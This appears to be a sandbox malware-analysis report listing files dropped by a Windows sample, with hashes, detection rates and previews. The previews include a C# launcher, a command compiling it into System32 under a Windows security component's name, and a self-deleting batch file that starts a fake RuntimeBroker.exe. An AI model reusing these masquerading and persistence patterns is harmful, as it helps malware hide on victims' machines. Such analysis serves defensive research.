                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1719296
                                                                    Entropy (8bit):7.457136013265021
                                                                    Encrypted:false
                                                                    SSDEEP:24576:/KEYWAa5pLMzdFGZWWs5cRtb6kMgmrmtXVdaNjTXf3qtzdzkkJj6:/p1JAz5cjb6k4cFdaNjTXfa/
                                                                    MD5:477DB3DE46B7779B63495A8BDB279F2C
                                                                    SHA1:77DC3F7D83728294C49298DB82DD0E668ADC3A73
                                                                    SHA-256:8B0B6F7BA3C1C98FDC17CEB74E37057793E104DC92AA4D4319D71411B3E56366
                                                                    SHA-512:4AC940FA7CE3C8A2A646639A5B00C5C8A1DCAFCFBA460782068446A321455CF5AF10E1E6AE4E6753150BEAB7D2431A7C38192787B32C4E508B73F4B3AC843956
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 66%
                                                                    • Antivirus: Virustotal, Detection: 53%, Browse
                                                                    Joe Sandbox View:
                                                                    • Filename: 3AAyq819Vy.exe, Detection: malicious, Browse
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:false
                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:ASCII text, with very long lines (406), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):406
                                                                    Entropy (8bit):5.837973769961566
                                                                    Encrypted:false
                                                                    SSDEEP:6:wNxIJkOztHDWVKHZrvU7Cz2jXytlvf7SSehPCcTNc5zARKFSSiNEdLAR7JnpdF1x:wHIeOztjZZrMWz2qAlNaA04Ee79zv1rT
                                                                    MD5:773FB730726AF31C88942CC1CFB2ACA6
                                                                    SHA1:4DDD87B8FC7BD5DC75B1A9FBBDA806163DD9063B
                                                                    SHA-256:5BBEBFCBB39B5A81846225D8C9288D8DD33371F0077C17A37B6E03746B9438D2
                                                                    SHA-512:B6572C826243A5B5CD4A0E18BF7CEAF2C4C0A659D1ECB193088DFF943016206724F5C930EE3739510DF07B282E0581D455C07025C8570EF19EBB48FB1AC3DB92
                                                                    Malicious:false
                                                                    Preview:G6kq61AphUaIDHjMyCpqThYTh025xgNfSV9yk52Gkhe9r8PUmd2Q1NFihQIG9E1AG50sIum3KjFwDZljlhSUn7oEPbQUxvGgpd2wIhM219FSHTeIoifbvhWIQvcrdSFYciGkgzbDUaco2V666IpOQpvHGtfWFfYj3qzjM4lzHbGUErQ5yfuUm0Iwx9dwTE8zB3vLgXuChzHyjaDYckijuD6CiDvNaygCdQSL6FYavsxxsUNW5ETsfZE86sndmhlsTFVSH2cXLHyBQJTNzYRWexgDLUOOc5yNHEdn85PDm6hYkDsxYZnNPOOgiRGxnN4PTk4LppP4JNtiPIdImb0DSk8207FrybaYBREAJhHsKtEBfpQZy7LMX17smBUskhFrxUg8Dc9ETH3ig6XKqp21QN
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:CSV text
                                                                    Category:modified
                                                                    Size (bytes):1306
                                                                    Entropy (8bit):5.353303787007226
                                                                    Encrypted:false
                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUN+E4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT4T
                                                                    MD5:BD55EA7BCC4484ED7DE5C6F56A64EF15
                                                                    SHA1:76CBF3B5E5A83EC67C4381F697309877F0B20BBE
                                                                    SHA-256:81E0A3669878ED3FFF8E565607FB86C5478D7970583E7010D191A8BC4E5066B6
                                                                    SHA-512:B50A3F8F5D18D3F1C85A6A5C9A46258B1D6930B75C847F0FB6E0A7CD0627E4690125BB3171A2D6554DEBE240ADAB2FF23ABDECA9959357B48089CFBF1F0D9FD8
                                                                    Malicious:true
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste
                                                                    Process:C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    File Type:CSV text
                                                                    Category:dropped
                                                                    Size (bytes):847
                                                                    Entropy (8bit):5.354334472896228
                                                                    Encrypted:false
                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                    Process:C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe
                                                                    File Type:CSV text
                                                                    Category:dropped
                                                                    Size (bytes):847
                                                                    Entropy (8bit):5.354334472896228
                                                                    Encrypted:false
                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:modified
                                                                    Size (bytes):64
                                                                    Entropy (8bit):1.1510207563435464
                                                                    Encrypted:false
                                                                    SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                                    MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                                    SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                                    SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                                    SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                                    Malicious:false
                                                                    Preview:@...e................................................@..........
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                    Category:dropped
                                                                    Size (bytes):392
                                                                    Entropy (8bit):5.032773997772295
                                                                    Encrypted:false
                                                                    SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLKcRanaiFkD:JNVQIbSfhV7TiFkMSfhhRan7FkD
                                                                    MD5:BAF1B195C51F34C18B928B9A56C39040
                                                                    SHA1:691E994A2E992366BE7F51F513FDA888E6F6F2B7
                                                                    SHA-256:AC77D2ACD4C95B5516D7166BBCB9399510C05D610E9FEB3622882257A8B6AE4E
                                                                    SHA-512:54AB4E07598ECF987206D2DD295680DC1ACCE285EAA3099B805AEE3EAF4E3B349921C4693D7F5874B6CC105229EA8BFABEBFE789433E7B3948A28E1506DCFE0D
                                                                    Malicious:false
                                                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"); } catch { } }).Start();. }.}.
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):250
                                                                    Entropy (8bit):5.095888923417247
                                                                    Encrypted:false
                                                                    SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23f3DSlAn:Hu7L//TRq79cQWf7SGn
                                                                    MD5:98010AFFE09B9E8B415C11602CC72CAC
                                                                    SHA1:0E5DD1110B992162A9FD9BBDA805E542973DBA92
                                                                    SHA-256:7F739325F3D976CBBC0D3F46FAF9399DF74971F098F21AD91F55EF80EC52A490
                                                                    SHA-512:E8BAE5961FFB61F0ABC807DAB95398E714E16D0310BD0BD9533C929C7B6DFD37E23EE961D59B5C5660E6AC5B5FFDBD0A60AC95643B044F210727A7E9291038EC
                                                                    Malicious:true
                                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.0.cs"
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF, CR line terminators
                                                                    Category:modified
                                                                    Size (bytes):750
                                                                    Entropy (8bit):5.261085156197047
                                                                    Encrypted:false
                                                                    SSDEEP:12:KJN/I/u7L//TRq79cQWf7SGuKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBI/un/Vq79tWf7SHKax5DqBVKVrdFf
                                                                    MD5:AB149E164D2FC54439ED8CC13DFB2400
                                                                    SHA1:705744C366C1672E601EB38ABD1BCC617B42E006
                                                                    SHA-256:A9CE179B3AFFD55877F7B9C08E2A896748FCE682FC956A1807EA3CA9A7572C53
                                                                    SHA-512:B9438527C8972182D3FD4C2B534312A9A59CB222CE0B58B4E6B8540B6C16E2D3804DC9FA852AE70B6F4B782BDE455F6A0CEB1507A65A2C6D06CFC2F6129DFBCF
                                                                    Malicious:false
                                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e8, 10 symbols, created Wed Nov 6 03:38:03 2024, 1st section name ".debug$S"
                                                                    Category:dropped
                                                                    Size (bytes):1952
                                                                    Entropy (8bit):4.5546710585422
                                                                    Encrypted:false
                                                                    SSDEEP:24:HpbW96XONjDfHKwKEsmNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0++UZ:S9BKhmMluOulajfqXSfbNtmh5Z
                                                                    MD5:164F64BB2C7FCE1545078C30B6F72176
                                                                    SHA1:1CFF3058F5E43128EB325A0CE057F412364FE6F2
                                                                    SHA-256:FB61A06997FD7C6F01CA4A6C735BBBDFFE18D82EE0DC82878D2DD00975CFEEEB
                                                                    SHA-512:7CB0E049A5601A1F17D3465601A066C54AC286FABE2774EE86DCF2C3C05849C583E4E255D6523E112C1FE17F08B48D5F5ACF4237390DB49B7118B003CCC54C91
                                                                    Malicious:false
                                                                    Preview:L.....*g.............debug$S........8...................@..B.rsrc$01................d...........@..@.rsrc$02........p...x...............@..@........<....c:\Windows\System32\CSCF98670F718C4420FABE8D0275D85BFD.TMP..................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RES790E.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):25
                                                                    Entropy (8bit):4.403856189774723
                                                                    Encrypted:false
                                                                    SSDEEP:3:B3ZIS+i53n:Is53
                                                                    MD5:126549DC99D759414B612D84629C09AA
                                                                    SHA1:B22F474FD38BC083463E852B98F6027A7424E782
                                                                    SHA-256:F39122D33B3326A1690C80549C7BC754248B8A8DA1F76CD6D81D261759038CCE
                                                                    SHA-512:2617E34D38FD69AAC7277040B03FCB34EBC97BE3C2B19F06B74D5CA1C22CBADE3FFC3C4533B3FC7F89AFFFD32DBC9695AC0CD200007E453788B987B67E777B67
                                                                    Malicious:false
                                                                    Preview:u1iof7OsSkwQYGgCfrsdUZOlR
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):204
                                                                    Entropy (8bit):5.273650810114031
                                                                    Encrypted:false
                                                                    SSDEEP:6:hCRLuVFOOr+DER5I3uhqhARvIKOZG1wkn23frz:CuVEOCDEfTVCfv
                                                                    MD5:9483DEA70E0EE86180F199F5136B8F16
                                                                    SHA1:6BFE1D36BFDD8396B7FC4D4C57AFED2CC0B557B4
                                                                    SHA-256:ACA2B4AD2A5510BD6A510A4C0EA3D089CCFD3A513983CF94850CC417C13A5E17
                                                                    SHA-512:85174ED45642766485AA990A5889326C1C6916DA5306DE7189F887FB5F0A95CCFEB90A15B86E8E75480FA4951EBDB2A5C8F4E8FFAEC160CC647714AAEAFA3BFB
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\nQeR8AonhE.bat"
                                                                    Process:C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):32256
                                                                    Entropy (8bit):5.631194486392901
                                                                    Encrypted:false
                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 24%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                    Process:C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):23552
                                                                    Entropy (8bit):5.519109060441589
                                                                    Encrypted:false
                                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):67
                                                                    Entropy (8bit):5.304603369433086
                                                                    Encrypted:false
                                                                    SSDEEP:3:zQnVwz6t5VDqNxRTj:fG5w1j
                                                                    MD5:E9A69E8C79D669B2689C59A278250500
                                                                    SHA1:2E909E95D561B31DBE828B23B61DB21B7B7BA11E
                                                                    SHA-256:3DAAE246A0142619CD1B0E721790F48D6D1EDE06018644AF63F5B578177FD105
